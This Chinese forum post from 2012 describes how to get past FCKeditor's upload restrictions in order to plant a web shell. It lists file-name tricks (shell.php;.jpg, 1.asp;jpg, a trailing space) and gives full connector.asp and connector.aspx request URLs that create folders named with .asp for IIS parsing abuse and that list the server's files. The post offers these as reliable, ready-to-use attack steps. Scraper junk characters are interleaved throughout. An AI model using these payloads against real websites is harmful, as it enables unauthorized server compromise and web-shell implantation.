很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
+ y3 c7 y1 f' n5 d9 w/ |; Y; G0 x2 O. a
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
Z' G8 B+ M9 ?, g6 Y0 c5 I# l" D% a! i. ]4 C9 ]4 R
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。 P, @6 I& |+ i% A/ z) [
. p' |* R; T+ n) O突破建立文件夹:% W; M3 N8 ?/ N: {
2 O8 {. i5 C0 Zeditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
4 |$ @! p$ ]( t" f1 W. L
+ j3 n) v8 S# y( L6 O参数:* J9 k6 i8 [/ W- O$ N
6 q4 Y) Z3 Y; T- a4 }当前目录名:CurrentFolder=/qing.asp
, h7 O0 W0 n4 K' k0 I2 V
z2 w9 z# V0 g; d+ G7 `新的目录名:NewFolderName=x.asp, C7 J/ L- G3 x
8 Y" W& n% u; T) Z3 r5 D
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
! U) ~, U; u5 f( \
% C- B- f( u5 h& Z% g那么 x.asp 就已经建立生成了,此方法百试百灵!; L# D4 \# i9 m6 N
/ J) V- j1 t3 y* i# c4 a; @! n
新建文件夹参数 x.asp,基本都能搞定。
- f0 C7 Z8 z- i* q2 L( h( ^4 I/ c/ g+ z- K. r3 H
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
' {3 d. Q# l3 [$ d$ b0 f8 W. a4 j( D; D
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp# o0 O5 d# a7 E6 i! l+ M4 ~6 L& e
# q. Z' `6 M f$ @获取文件列表
4 `1 z. H3 c2 |! i* w% a4 {0 R+ B aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
6 E" d- L) {" n; L# ^' ^- h) W- S/ R! V- T5 S5 _
|
发表于 2012-12-31 09:27:09
收藏
支持
反对